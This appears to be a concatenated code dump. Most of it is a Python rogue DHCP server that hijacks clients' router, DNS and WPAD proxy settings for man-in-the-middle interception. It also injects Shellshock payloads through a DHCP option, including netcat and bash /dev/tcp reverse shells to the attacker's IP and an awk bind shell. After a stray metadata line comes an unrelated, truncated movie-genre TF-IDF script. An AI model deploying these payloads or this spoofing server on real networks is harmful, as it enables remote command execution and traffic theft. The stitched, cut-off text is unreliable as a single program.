Base.print_error("Bad value `-I, --target_ip`: ", args.target_ip,
"; target IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
target_ip_address = args.target_ip
else:
Base.print_error("Please set target MAC address (example: --target_mac 00:AA:BB:CC:DD:FF)" +
", for target IP address: ", args.target_ip)
exit(1)
# Set default first offer IP and last offer IP
first_offer_ip_address = str(IPv4Address(unicode(first_ip_address)) + 1)
last_offer_ip_address = str(IPv4Address(unicode(last_ip_address)) - 1)
# endregion
# region Target IP is not set - get first and last offer IP
else:
# Check first offer IP address
if args.first_offer_ip is None:
first_offer_ip_address = str(IPv4Address(unicode(first_ip_address)) + 1)
else:
if not Base.ip_address_in_range(args.first_offer_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `-f, --first_offer_ip`: ", args.first_offer_ip,
"; first IP address in your network: ", first_ip_address)
exit(1)
else:
first_offer_ip_address = args.first_offer_ip
# Check last offer IP address
if args.last_offer_ip is None:
last_offer_ip_address = str(IPv4Address(unicode(last_ip_address)) - 1)
else:
if not Base.ip_address_in_range(args.last_offer_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `-l, --last_offer_ip`: ", args.last_offer_ip,
"; last IP address in your network: ", last_ip_address)
exit(1)
else:
last_offer_ip_address = args.last_offer_ip
# endregion
# endregion
# region Set DHCP sever MAC and IP address
if args.dhcp_mac is None:
dhcp_server_mac_address = your_mac_address
else:
dhcp_server_mac_address = args.dhcp_mac
if args.dhcp_ip is None:
dhcp_server_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.dhcp_ip, first_ip_address, last_ip_address):
Base.print_error("Bad value `--dhcp_ip`: ", args.dhcp_ip,
"; DHCP server IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
dhcp_server_ip_address = args.dhcp_ip
# endregion
# region Set router, dns, tftp, wins IP address
# Set router IP address
if args.router is None:
router_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.router, first_ip_address, last_ip_address):
Base.print_error("Bad value `--router`: ", args.router,
"; Router IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
router_ip_address = args.router
# Set DNS server IP address
if args.dns is None:
dns_server_ip_address = your_ip_address
else:
if not Base.ip_address_validation(args.dns):
Base.print_error("Bad DNS server IP address in `--dns` parameter: ", args.dns)
exit(1)
else:
dns_server_ip_address = args.dns
# Set TFTP server IP address
if args.tftp is None:
tftp_server_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.tftp, first_ip_address, last_ip_address):
Base.print_error("Bad value `--tftp`: ", args.tftp,
"; TFTP server IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
tftp_server_ip_address = args.tftp
# Set WINS server IP address
if args.wins is None:
wins_server_ip_address = your_ip_address
else:
if not Base.ip_address_in_range(args.wins, first_ip_address, last_ip_address):
Base.print_error("Bad value `--wins`: ", args.tftp,
"; WINS server IP address must be in range: ", first_ip_address + " - " + last_ip_address)
exit(1)
else:
wins_server_ip_address = args.wins
# endregion
# region Set proxy
if args.proxy is not None:
# Set variables
wpad_url = "http://" + your_ip_address + "/wpad.dat"
apache2_sites_available_dir = "/etc/apache2/sites-available/"
apache2_sites_path = "/var/www/html/"
wpad_path = apache2_sites_path + "wpad/"
# Apache2 sites settings
default_site_file_name = "000-default.conf"
default_site_file = open(apache2_sites_available_dir + default_site_file_name, 'w')
default_site_file.write("<VirtualHost *:80>\n" +
"\tServerAdmin [email protected]\n" +
"\tDocumentRoot " + wpad_path + "\n" +
"\t<Directory " + wpad_path + ">\n" +
"\t\tOptions FollowSymLinks\n" +
"\t\tAllowOverride None\n" +
"\t\tOrder allow,deny\n" +
"\t\tAllow from all\n" +
"\t</Directory>\n" +
"</VirtualHost>\n")
default_site_file.close()
# Create dir with wpad.dat script
try:
makedirs(wpad_path)
except OSError:
Base.print_info("Path: ", wpad_path, " already exist")
except:
Base.print_error("Something else went wrong while trying to create path: ", wpad_path)
exit(1)
# Copy wpad.dat script
wpad_script_name = "wpad.dat"
wpad_script_src = utils_path + wpad_script_name
wpad_script_dst = wpad_path + wpad_script_name
copyfile(src=wpad_script_src, dst=wpad_script_dst)
# Read redirect script
with open(wpad_script_dst, 'r') as redirect_script:
content = redirect_script.read()
# Replace the Proxy URL
content = content.replace('proxy_url', args.proxy)
# Write redirect script
with open(wpad_script_dst, 'w') as redirect_script:
redirect_script.write(content)
# Restart Apache2 server
try:
Base.print_info("Restarting apache2 server ...")
sub.Popen(['service apache2 restart >/dev/null 2>&1'], shell=True)
except OSError as e:
if e.errno == errno.ENOENT:
Base.print_error("Program: ", "service", " is not installed!")
exit(1)
else:
Base.print_error("Something went wrong while trying to run ", "`service apache2 restart`")
exit(2)
# Check apache2 is running
sleep(2)
apache2_pid = Base.get_process_pid("apache2")
if apache2_pid == -1:
Base.print_error("Apache2 server is not running!")
exit(1)
else:
Base.print_info("Apache2 server is running, PID: ", str(apache2_pid))
# endregion
# region Set Shellshock option code
if 255 < args.shellshock_option_code < 0:
Base.print_error("Bad value: ", args.shellshock_option_code,
"in DHCP option code! This value should be in the range from 1 to 254")
exit(1)
# endregion
# region Set search domain
domain = bytes(args.domain)
# endregion
# region General output
if not args.quiet:
Base.print_info("Network interface: ", current_network_interface)
Base.print_info("Your IP address: ", your_ip_address)
Base.print_info("Your MAC address: ", your_mac_address)
if target_mac_address is not None:
Base.print_info("Target MAC: ", target_mac_address)
# If target IP address is set print target IP, else print first and last offer IP
if target_ip_address is not None:
Base.print_info("Target IP: ", target_ip_address)
else:
Base.print_info("First offer IP: ", first_offer_ip_address)
Base.print_info("Last offer IP: ", last_offer_ip_address)
Base.print_info("DHCP server mac address: ", dhcp_server_mac_address)
Base.print_info("DHCP server ip address: ", dhcp_server_ip_address)
Base.print_info("Router IP address: ", router_ip_address)
Base.print_info("DNS server IP address: ", dns_server_ip_address)
Base.print_info("TFTP server IP address: ", tftp_server_ip_address)
if args.proxy is not None:
Base.print_info("Proxy url: ", args.proxy)
# endregion
# region Get free IP addresses in local network
def get_free_ip_addresses():
global Scanner
# Get all IP addresses in range from first to last offer IP address
current_ip_address = first_offer_ip_address
while IPv4Address(unicode(current_ip_address)) <= IPv4Address(unicode(last_offer_ip_address)):
free_ip_addresses.append(current_ip_address)
current_ip_address = str(IPv4Address(unicode(current_ip_address)) + 1)
Base.print_info("ARP scan on interface: ", current_network_interface, " is running ...")
localnet_ip_addresses = Scanner.find_ip_in_local_network(current_network_interface)
for ip_address in localnet_ip_addresses:
try:
free_ip_addresses.remove(ip_address)
except ValueError:
pass
# endregion
# region Add client info in global clients dictionary
def add_client_info_in_dictionary(client_mac_address, client_info, this_client_already_in_dictionary=False):
if this_client_already_in_dictionary:
clients[client_mac_address].update(client_info)
else:
clients[client_mac_address] = client_info
# endregion
# region Make DHCP offer packet
def make_dhcp_offer_packet(transaction_id, offer_ip, client_mac, destination_mac=None, destination_ip=None):
if destination_mac is None:
destination_mac = "ff:ff:ff:ff:ff:ff"
if destination_ip is None:
destination_ip = "255.255.255.255"
return dhcp.make_response_packet(source_mac=dhcp_server_mac_address,
destination_mac=destination_mac,
source_ip=dhcp_server_ip_address,
destination_ip=destination_ip,
transaction_id=transaction_id,
your_ip=offer_ip,
client_mac=client_mac,
dhcp_server_id=dhcp_server_ip_address,
lease_time=args.lease_time,
netmask=network_mask,
router=router_ip_address,
dns=dns_server_ip_address,
dhcp_operation=2,
payload=None)
# endregion
# region Make DHCP ack packet
def make_dhcp_ack_packet(transaction_id, target_mac, target_ip, destination_mac=None, destination_ip=None):
if destination_mac is None:
destination_mac = "ff:ff:ff:ff:ff:ff"
if destination_ip is None:
destination_ip = "255.255.255.255"
return dhcp.make_response_packet(source_mac=dhcp_server_mac_address,
destination_mac=destination_mac,
source_ip=dhcp_server_ip_address,
destination_ip=destination_ip,
transaction_id=transaction_id,
your_ip=target_ip,
client_mac=target_mac,
dhcp_server_id=dhcp_server_ip_address,
lease_time=args.lease_time,
netmask=network_mask,
router=router_ip_address,
dns=dns_server_ip_address,
dhcp_operation=5,
payload=shellshock_url,
proxy=bytes(wpad_url),
domain=domain,
tftp=tftp_server_ip_address,
wins=wins_server_ip_address,
payload_option_code=args.shellshock_option_code)
# endregion
# region Make DHCP nak packet
def make_dhcp_nak_packet(transaction_id, target_mac, target_ip, requested_ip):
return dhcp.make_nak_packet(source_mac=dhcp_server_mac_address,
destination_mac=target_mac,
source_ip=dhcp_server_ip_address,
destination_ip=requested_ip,
transaction_id=transaction_id,
your_ip=target_ip,
client_mac=target_mac,
dhcp_server_id=dhcp_server_ip_address)
# endregion
# def ack_sender():
# SOCK = socket(AF_PACKET, SOCK_RAW)
# SOCK.bind((current_network_interface, 0))
# ack_packet = make_dhcp_ack_packet(transaction_id_global, requested_ip_address)
# while True:
# SOCK.send(ack_packet)
# sleep(0.01)
# region Send DHCP discover packets
def discover_sender(number_of_packets=999999):
global discover_sender_is_work
discover_sender_is_work = True
packet_index = 0
SOCK = socket(AF_PACKET, SOCK_RAW)
SOCK.bind((current_network_interface, 0))
if dhcp_discover_packets_source_mac != your_mac_address:
relay_agent_ip_address = Base.get_netiface_random_ip(current_network_interface)
while packet_index < number_of_packets:
try:
discover_packet = dhcp.make_discover_packet(source_mac=dhcp_discover_packets_source_mac,
client_mac=eth.get_random_mac(),
host_name=Base.make_random_string(8),
relay_ip=relay_agent_ip_address)
SOCK.send(discover_packet)
sleep(args.discover_delay)
except:
Base.print_error("Something went wrong when sending DHCP discover packets!")
packet_index += 1
else:
while packet_index < number_of_packets:
try:
discover_packet = dhcp.make_discover_packet(source_mac=dhcp_discover_packets_source_mac,
client_mac=eth.get_random_mac(),
host_name=Base.make_random_string(8),
relay_ip=your_ip_address)
SOCK.send(discover_packet)
sleep(args.discover_delay)
except:
Base.print_error("Something went wrong when sending DHCP discover packets!")
packet_index += 1
SOCK.close()
discover_sender_is_work = False
# endregion
# region Reply to DHCP and ARP requests
def reply(request):
# region Define global variables
global SOCK
global clients
global target_ip_address
global router_ip_address
global payload
global shellshock_url
global args
global discover_sender_is_work
# endregion
# region DHCP
if 'DHCP' in request.keys():
# region Get transaction id and client MAC address
transaction_id = request['BOOTP']['transaction-id']
client_mac_address = request['BOOTP']['client-mac-address']
# endregion
# region Check this client already in dict
client_already_in_dictionary = False
if client_mac_address in clients.keys():
client_already_in_dictionary = True
# endregion
# region DHCP DISCOVER
if request['DHCP'][53] == 1:
# region Print INFO message
Base.print_info("DHCP DISCOVER from: ", client_mac_address, " transaction id: ", hex(transaction_id))
# endregion
# If parameter "Do not send DHCP OFFER packets" is not set
if not args.dnsop:
# region Start DHCP discover sender
if args.send_discover:
if not discover_sender_is_work:
discover_sender(100)
# endregion
# If target IP address is set - offer IP = target IP
if target_ip_address is not None:
offer_ip_address = target_ip_address
# If target IP address is not set - offer IP = random IP from free IP addresses list
else:
random_index = randint(0, len(free_ip_addresses))
offer_ip_address = free_ip_addresses[random_index]
# Delete offer IP from free IP addresses list
del free_ip_addresses[random_index]
if args.broadcast_response:
offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address)
else:
offer_packet = make_dhcp_offer_packet(transaction_id, offer_ip_address, client_mac_address,
client_mac_address, offer_ip_address)
SOCK.send(offer_packet)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"transaction": transaction_id, "discover": True,
"offer_ip": offer_ip_address},
client_already_in_dictionary)
# Print INFO message
Base.print_info("DHCP OFFER to: ", client_mac_address, " offer IP: ", offer_ip_address)
# endregion
# region DHCP RELEASE
if request['DHCP'][53] == 7:
if request['BOOTP']['client-ip-address'] is not None:
client_ip = request['BOOTP']['client-ip-address']
Base.print_info("DHCP RELEASE from: ", client_ip + " (" + client_mac_address + ")",
" transaction id: ", hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"client_ip": client_ip},
client_already_in_dictionary)
# print clients
# Add release client IP in free IP addresses list
if client_ip not in free_ip_addresses:
free_ip_addresses.append(client_ip)
else:
Base.print_info("DHCP RELEASE from: ", client_mac_address, " transaction id: ", hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"release": True},
client_already_in_dictionary)
# print clients
# endregion
# region DHCP INFORM
if request['DHCP'][53] == 8:
if request['BOOTP']['client-ip-address'] is not None:
client_ip = request['BOOTP']['client-ip-address']
Base.print_info("DHCP INFORM from: ", client_ip + " (" + client_mac_address + ")",
" transaction id: ", hex(transaction_id))
# If client IP in free IP addresses list delete this
if client_ip in free_ip_addresses:
free_ip_addresses.remove(client_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"client_ip": client_ip},
client_already_in_dictionary)
# print clients
else:
Base.print_info("DHCP INFORM from: ", client_mac_address, " transaction id: ", hex(transaction_id))
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"inform": True},
client_already_in_dictionary)
# print clients
# endregion
# region DHCP REQUEST
if request['DHCP'][53] == 3:
# region Set local variables
requested_ip = "0.0.0.0"
offer_ip = None
# endregion
# region Get requested IP
if 50 in request['DHCP'].keys():
requested_ip = str(request['DHCP'][50])
# endregion
# region Print info message
Base.print_info("DHCP REQUEST from: ", client_mac_address, " transaction id: ", hex(transaction_id),
" requested ip: ", requested_ip)
# endregion
# region Requested IP not in range from first offer IP to last offer IP
if not Base.ip_address_in_range(requested_ip, first_offer_ip_address, last_offer_ip_address):
Base.print_warning("Client: ", client_mac_address, " requested IP: ", requested_ip,
" not in range: ", first_offer_ip_address + " - " + last_offer_ip_address)
# endregion
# region Requested IP in range from first offer IP to last offer IP
else:
# region Start DHCP discover sender
if args.send_discover:
if not discover_sender_is_work:
discover_sender(100)
# endregion
# region Change client info in global clients dictionary
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"request": True, "requested_ip": requested_ip,
"transaction": transaction_id},
client_already_in_dictionary)
# Delete ARP mitm success keys in dictionary for this client
clients[client_mac_address].pop('client request his ip', None)
clients[client_mac_address].pop('client request router ip', None)
clients[client_mac_address].pop('client request dns ip', None)
# endregion
# region Get offer IP address
try:
offer_ip = clients[client_mac_address]["offer_ip"]
except KeyError:
pass
# endregion
# region This client already send DHCP DISCOVER and offer IP != requested IP
if offer_ip is not None and offer_ip != requested_ip:
# Print error message
Base.print_error("Client: ", client_mac_address, " requested IP: ", requested_ip,
" not like offer IP: ", offer_ip)
# Create and send DHCP nak packet
nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address, offer_ip, requested_ip)
SOCK.send(nak_packet)
Base.print_info("DHCP NAK to: ", client_mac_address, " requested ip: ", requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"mitm": "error: offer ip not like requested ip", "offer_ip": None},
client_already_in_dictionary)
# print clients
# endregion
# region Offer IP == requested IP or this is a first request from this client
else:
# region Target IP address is set and requested IP != target IP
if target_ip_address is not None and requested_ip != target_ip_address:
# Print error message
Base.print_error("Client: ", client_mac_address, " requested IP: ", requested_ip,
" not like target IP: ", target_ip_address)
# Create and send DHCP nak packet
nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address,
target_ip_address, requested_ip)
SOCK.send(nak_packet)
Base.print_info("DHCP NAK to: ", client_mac_address, " requested ip: ", requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"mitm": "error: target ip not like requested ip", "offer_ip": None,
"nak": True},
client_already_in_dictionary)
# endregion
# region Target IP address is set and requested IP == target IP or Target IP is not set
else:
# region Settings shellshock payload
# region Create payload
# Network settings command in target machine
net_settings = args.ip_path + "ip addr add " + requested_ip + "/" + \
str(IPAddress(network_mask).netmask_bits()) + " dev " + args.iface_name + ";"
# Shellshock payload: <user bash command>
if args.shellshock_command is not None:
payload = args.shellshock_command
# Shellshock payload:
# awk 'BEGIN{s="/inet/tcp/<bind_port>/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &
if args.bind_shell:
payload = "awk 'BEGIN{s=\"/inet/tcp/" + str(args.bind_port) + \
"/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &"
# Shellshock payload:
# rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f &
if args.nc_reverse_shell:
payload = "rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + \
your_ip_address + " " + str(args.reverse_port) + " >/tmp/f &"
# Shellshock payload:
# /bin/nc -e /bin/sh <your_ip> <your_port> 2>&1 &
if args.nce_reverse_shell:
payload = "/bin/nc -e /bin/sh " + your_ip_address + " " + str(args.reverse_port) + " 2>&1 &"
# Shellshock payload:
# /bin/bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1 &
if args.bash_reverse_shell:
payload = "/bin/bash -i >& /dev/tcp/" + your_ip_address + \
"/" + str(args.reverse_port) + " 0>&1 &"
if payload is not None:
# Do not add network settings command in payload
if not args.without_network:
payload = net_settings + payload
# Send payload to target in clear text
if args.without_base64:
shellshock_url = "() { :; }; " + payload
# Send base64 encoded payload to target in clear text
else:
payload = b64encode(payload)
shellshock_url = "() { :; }; /bin/sh <(/usr/bin/base64 -d <<< " + payload + ")"
# endregion
# region Check Shellshock payload length
if shellshock_url is not None:
if len(shellshock_url) > 255:
Base.print_error("Length of shellshock payload is very big! Current length: ",
str(len(shellshock_url)), " Maximum length: ", "254")
shellshock_url = "A"
# endregion
# endregion
# region Send DHCP ack and print info message
if args.broadcast_response:
ack_packet = make_dhcp_ack_packet(transaction_id, client_mac_address, requested_ip)
else:
ack_packet = make_dhcp_ack_packet(transaction_id, client_mac_address, requested_ip,
client_mac_address, requested_ip)
Base.print_info("DHCP ACK to: ", client_mac_address, " requested ip: ", requested_ip)
SOCK.send(ack_packet)
# endregion
# region Add client info in global clients dictionary
try:
clients[client_mac_address].update({"mitm": "success"})
except KeyError:
clients[client_mac_address] = {"mitm": "success"}
# endregion
# endregion
# endregion
# endregion
# endregion
# region DHCP DECLINE
if request['DHCP'][53] == 4:
# Get requested IP
requested_ip = "0.0.0.0"
if 50 in request['DHCP'].keys():
requested_ip = str(request['DHCP'][50])
# Print info message
Base.print_info("DHCP DECLINE from: ", requested_ip + " (" + client_mac_address + ")",
" transaction id: ", hex(transaction_id))
# If client IP in free IP addresses list delete this
if requested_ip in free_ip_addresses:
free_ip_addresses.remove(requested_ip)
# Add client info in global clients dictionary
add_client_info_in_dictionary(client_mac_address,
{"decline_ip": requested_ip, "decline": True},
client_already_in_dictionary)
# print clients
# endregion
# endregion DHCP
# region ARP
if 'ARP' in request.keys():
if request['Ethernet']['destination'] == "ff:ff:ff:ff:ff:ff" and \
request['ARP']['target-mac'] == "00:00:00:00:00:00":
# region Set local variables
arp_sender_mac_address = request['ARP']['sender-mac']
arp_sender_ip_address = request['ARP']['sender-ip']
arp_target_ip_address = request['ARP']['target-ip']
# endregion
# region Print info message
Base.print_info("ARP request from: ", arp_sender_mac_address,
" \"", "Who has " + arp_target_ip_address + "? Tell " + arp_sender_ip_address, "\"")
# endregion
# region Get client mitm status
try:
mitm_status = clients[arp_sender_mac_address]["mitm"]
except KeyError:
mitm_status = ""
# endregion
# region Get client requested ip
try:
requested_ip = clients[arp_sender_mac_address]["requested_ip"]
except KeyError:
requested_ip = ""
# endregion
# region Create IPv4 address conflict
if mitm_status.startswith("error"):
arp_reply = arp.make_response(ethernet_src_mac=your_mac_address,
ethernet_dst_mac=arp_sender_mac_address,
sender_mac=your_mac_address, sender_ip=arp_target_ip_address,
target_mac=arp_sender_mac_address, target_ip=arp_sender_ip_address)
SOCK.send(arp_reply)
Base.print_info("ARP response to: ", arp_sender_mac_address,
" \"", arp_target_ip_address + " is at " + your_mac_address,
"\" (IPv4 address conflict)")
# endregion
# region MITM success
if mitm_status.startswith("success"):
if arp_target_ip_address == requested_ip:
clients[arp_sender_mac_address].update({"client request his ip": True})
if arp_target_ip_address == router_ip_address:
clients[arp_sender_mac_address].update({"client request router ip": True})
if arp_target_ip_address == dns_server_ip_address:
clients[arp_sender_mac_address].update({"client request dns ip": True})
try:
test = clients[arp_sender_mac_address]["client request his ip"]
test = clients[arp_sender_mac_address]["client request router ip"]
test = clients[arp_sender_mac_address]["client request dns ip"]
try:
test = clients[arp_sender_mac_address]["success message"]
except KeyError:
if args.exit:
sleep(3)
Base.print_success("MITM success: ", requested_ip + " (" + arp_sender_mac_address + ")")
exit(0)
else:
Base.print_success("MITM success: ", requested_ip + " (" + arp_sender_mac_address + ")")
clients[arp_sender_mac_address].update({"success message": True})
except KeyError:
pass
# endregion
# endregion
# endregion
# region Main function
if __name__ == "__main__":
# region Add ip addresses in list with free ip addresses from first to last offer IP
if target_ip_address is None:
Base.print_info("Create list with free IP addresses in your network ...")
get_free_ip_addresses()
# endregion
# region Send DHCP discover packets in the background thread
if args.send_discover:
Base.print_info("Start DHCP discover packets send in the background thread ...")
if args.discover_rand_mac:
dhcp_discover_packets_source_mac = eth.get_random_mac()
Base.print_info("DHCP discover packets Ethernet source MAC: ", dhcp_discover_packets_source_mac,
" (random MAC address)")
else:
dhcp_discover_packets_source_mac = your_mac_address
Base.print_info("DHCP discover packets Ethernet source MAC: ", dhcp_discover_packets_source_mac,
" (your MAC address)")
Base.print_info("Delay between DHCP discover packets: ", str(args.discover_delay))
tm.add_task(discover_sender)
# endregion
# region Sniff network
# region Create RAW socket for sniffing
raw_socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
# endregion
# region Print info message
Base.print_info("Waiting for a ARP or DHCP requests ...")
# endregion
# region Start sniffing
while True:
# region Try
try:
# region Sniff packets from RAW socket
packets = raw_socket.recvfrom(2048)
for packet in packets:
# region Parse Ethernet header
ethernet_header = packet[0:eth.header_length]
ethernet_header_dict = eth.parse_header(ethernet_header)
# endregion
# region Could not parse Ethernet header - break
if ethernet_header_dict is None:
break
# endregion
# region Ethernet filter
if target_mac_address is not None:
if ethernet_header_dict['source'] != target_mac_address:
break
else:
if ethernet_header_dict['source'] == your_mac_address:
break
if dhcp_discover_packets_source_mac is not None:
if ethernet_header_dict['source'] == dhcp_discover_packets_source_mac:
break
# endregion
# region ARP packet
# 2054 - Type of ARP packet (0x0806)
if ethernet_header_dict['type'] == arp.packet_type:
# region Parse ARP packet
arp_header = packet[eth.header_length:eth.header_length + arp.packet_length]
arp_packet_dict = arp.parse_packet(arp_header)
# endregion
# region Could not parse ARP packet - break
if arp_packet_dict is None:
break
# endregion
# region ARP filter
if arp_packet_dict['opcode'] != 1:
break
# endregion
# region Call function with full ARP packet
reply({
'Ethernet': ethernet_header_dict,
'ARP': arp_packet_dict
})
# endregion
# endregion
# region IP packet
# 2048 - Type of IP packet (0x0800)
if ethernet_header_dict['type'] == ip.header_type:
# region Parse IP header
ip_header = packet[eth.header_length:]
ip_header_dict = ip.parse_header(ip_header)
# endregion
# region Could not parse IP header - break
if ip_header_dict is None:
break
# endregion
# region UDP
if ip_header_dict['protocol'] == udp.header_type:
# region Parse UDP header
udp_header_offset = eth.header_length + (ip_header_dict['length'] * 4)
udp_header = packet[udp_header_offset:udp_header_offset + udp.header_length]
udp_header_dict = udp.parse_header(udp_header)
# endregion
# region Could not parse UDP header - break
if udp_header is None:
break
# endregion
# region DHCP packet
if udp_header_dict['destination-port'] == 67 and udp_header_dict['source-port'] == 68:
# region Parse DHCP packet
dhcp_packet_offset = udp_header_offset + udp.header_length
dhcp_packet = packet[dhcp_packet_offset:]
dhcp_packet_dict = dhcp.parse_packet(dhcp_packet)
# endregion
# region Could not parse DHCP packet - break
if dhcp_packet_dict is None:
break
# endregion
# region Call function with full DHCP packet
full_dhcp_packet = {
'Ethernet': ethernet_header_dict,
'IP': ip_header_dict,
'UDP': udp_header_dict
}
full_dhcp_packet.update(dhcp_packet_dict)
reply(full_dhcp_packet)
# endregion
# endregion
# endregion
# endregion
# endregion
# endregion
# region Exception - KeyboardInterrupt
except KeyboardInterrupt:
Base.print_info("Exit")
exit(0)
# endregion
# endregion
# endregion
# endregion
| unlicense | 2,859,265,539,066,611,700 | 41.478261 | 131 | 0.544649 | false | 4.269039 | false | false | false |
jadhavhninad/-CSE_515_MWD_Analytics- | Phase 1/Project Code/phase1_code/differentiate_genre.py | 1 | 17298 | from mysqlConn import DbConnect
import argparse
import operator
from math import log,fabs
import pprint
#DB connector and curosor
db = DbConnect()
db_conn = db.get_connection()
cur2 = db_conn.cursor();
#Argument parser
parser = argparse.ArgumentParser()
parser.add_argument("GENRE1")
parser.add_argument("GENRE2")
parser.add_argument("MODEL")
args = parser.parse_args()
##########################################
#General computation
#########################################
#1. Getting total number of movies in genre1 U genre2
cur2.execute("SELECT COUNT(distinct movieid) FROM mlmovies_clean where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result0 = cur2.fetchone()
total_movie_count = float(result0[0])
if args.MODEL== "TF-IDF-DIFF":
###############################
#MODEL = TF_IDF_DIFF
###############################
#===============================================================================================
#Subtask-1 : Calculate the weighted unique movies count returned by a tag for set of movies in genre1 U genre2
#===============================================================================================
cur2.execute("SELECT COUNT(distinct movieid) FROM mlmovies_clean where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result0 = cur2.fetchone()
total_movie_count = result0[0]
#Since we already have the TF value and it's data, we now generate the required data for idf.
#IDF here will be considered as the number of movie-genre that belong to a certain tag. So the idf calculation will be
# Total movie-genres / sum of weight of movie-genre with a particular tag
#Calculate the total weighted count for movie-genre count for each tag.
#weighted count for an occurance of a tag = tag_newness
weighted_genre_movie_count={}
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
#print data1
genre_movie_id = data1[0]
genre_tag_id=""
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
genre_tag_newness = data2[1]
#Get the tag_name for the tagID. For each tag weight, add the rank_weight as well.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
tagWeight = round((float(genre_tag_newness)),10)
if tagName in weighted_genre_movie_count:
weighted_genre_movie_count[tagName] = round((weighted_genre_movie_count[tagName] + tagWeight), 10)
else:
weighted_genre_movie_count[tagName] = tagWeight
# ===============================================================================
#Subtask-2: Get the TF , IDF and TF-IDF for the genres
#===============================================================================
data_dictionary_tf_genre1 = {}
data_dictionary_tf_idf_genre1 = {}
total_tag_newness_weight = 0
#Get all movies of genre 1.
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE1])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
genre_tag_newness = data2[1]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
tagWeight = round(float(genre_tag_newness),10)
total_tag_newness_weight = total_tag_newness_weight + tagWeight
#For TF
if tagName in data_dictionary_tf_genre1:
data_dictionary_tf_genre1[tagName] = round((data_dictionary_tf_genre1[tagName] + tagWeight),10)
else:
data_dictionary_tf_genre1[tagName] = tagWeight
# Make weight of other tags to zero. Calculate the tf, idf and tf-idf values for the tags that exist.
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyVal in tagName:
key = keyVal[0]
if key in data_dictionary_tf_genre1:
data_dictionary_tf_genre1[key] = round((float(data_dictionary_tf_genre1[key]) / float(total_tag_newness_weight)),10)
data_dictionary_tf_idf_genre1[key] = round((float(log((total_movie_count/weighted_genre_movie_count[key]),2.71828))), 10)
data_dictionary_tf_idf_genre1[key] = round((data_dictionary_tf_genre1[key] * data_dictionary_tf_idf_genre1[key]), 10)
else:
data_dictionary_tf_genre1[key] = 0.0
#genre_model_value_tf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True)
#genre_model_value_tfidf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True)
#Get all movies of a specific genre 2.
#--------------------------------------
data_dictionary_tf_genre2 = {}
data_dictionary_tf_idf_genre2 = {}
total_tag_newness_weight = 0
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
genre_tag_newness = data2[1]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
tagWeight = round(float(genre_tag_newness),10)
total_tag_newness_weight = total_tag_newness_weight + tagWeight
#For TF
if tagName in data_dictionary_tf_genre2:
data_dictionary_tf_genre2[tagName] = round((data_dictionary_tf_genre2[tagName] + tagWeight),10)
else:
data_dictionary_tf_genre2[tagName] = tagWeight
# Make weight of other tags to zero.
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyVal in tagName:
key=keyVal[0]
if key in data_dictionary_tf_genre2:
